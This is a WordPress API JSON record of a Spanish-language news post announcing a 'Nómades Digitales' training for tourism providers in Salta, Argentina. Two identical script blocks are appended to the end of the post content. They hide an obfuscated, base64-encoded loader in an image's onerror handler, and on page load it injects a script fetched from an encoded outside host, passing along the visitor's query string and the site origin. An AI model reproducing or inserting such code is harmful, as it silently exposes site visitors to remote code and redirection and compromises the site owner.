{"id":1783,"date":"2022-11-14T09:53:28","date_gmt":"2022-11-14T12:53:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1783"},"modified":"2025-08-14T00:30:25","modified_gmt":"2025-08-14T03:30:25","slug":"nomades-digitales-nueva-capacitacion-para-prestadores-turisticos-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1783","title":{"rendered":"N\u00f3mades Digitales: Nueva capacitaci\u00f3n para prestadores tur\u00edsticos de Salta"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#083048\"><em>El mi\u00e9rcoles 16 se presentar\u00e1 en la provincia esta estrategia nacional de formaci\u00f3n para emprendimientos tur\u00edsticos. El objetivo es generar entornos atractivos para turistas con este perfil.<\/em><\/h4>\n\n\n\n<p>La Provincia y la Naci\u00f3n encaran esta semana una nueva capacitaci\u00f3n conjunta, en este caso destinada a emprendimientos tur\u00edsticos, organizaciones con espacios digitales colaborativos y atractivos para n\u00f3mades digitales. Se incluyen en estos requerimientos a bares, restaurantes, confiter\u00edas o espacios de coworking.<\/p>\n\n\n\n<p>N\u00f3mades Digitales, forma parte de la Estrategia Nacional de Turismo que el mi\u00e9rcoles 16 a partir de las 15 horas presentar\u00e1 junto al Ministerio de Turismo y Deportes de Salta en Uthgra, Mitre &nbsp;966.<\/p>\n\n\n\n<p>El objetivo es atraer este tipo de perfil de turista y generar oportunidades de desarrollo y promoci\u00f3n de los destinos tur\u00edsticos creando espacios atractivos y amigables con este tipo de viajero. Por tal motivo se invita a la presentaci\u00f3n a prestadores del sector, organizaciones con espacios digitales(locales gastron\u00f3micos) o de coworking. Tambi\u00e9n para \u00e1reas de prensa y comunicaci\u00f3n del sector p\u00fablico y privado, t\u00e9cnicos provinciales, municipales y locales tur\u00edsticos.<\/p>\n\n\n\n<p>La capacitaci\u00f3n estar\u00e1 a cargo de Inprotur, de la Direcci\u00f3n Nacional de Calidad e Innovaci\u00f3n Tur\u00edstica y de la Direcci\u00f3n de Promoci\u00f3n Estrat\u00e9gica del Turismo.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/nomades-digitales-nueva-capacitacion-para-prestadores-turisticos-de-salta-86141\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El mi\u00e9rcoles 16 se presentar\u00e1 en la provincia esta estrategia nacional de formaci\u00f3n para emprendimientos tur\u00edsticos. El objetivo es generar entornos atractivos para turistas con este perfil. La Provincia y la Naci\u00f3n encaran esta semana una nueva capacitaci\u00f3n conjunta, en este caso destinada a emprendimientos tur\u00edsticos, organizaciones con espacios digitales colaborativos y atractivos para n\u00f3mades [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1784,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-1783","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1783"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1783"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1783\/revisions"}],"predecessor-version":[{"id":7278,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1783\/revisions\/7278"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1784"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}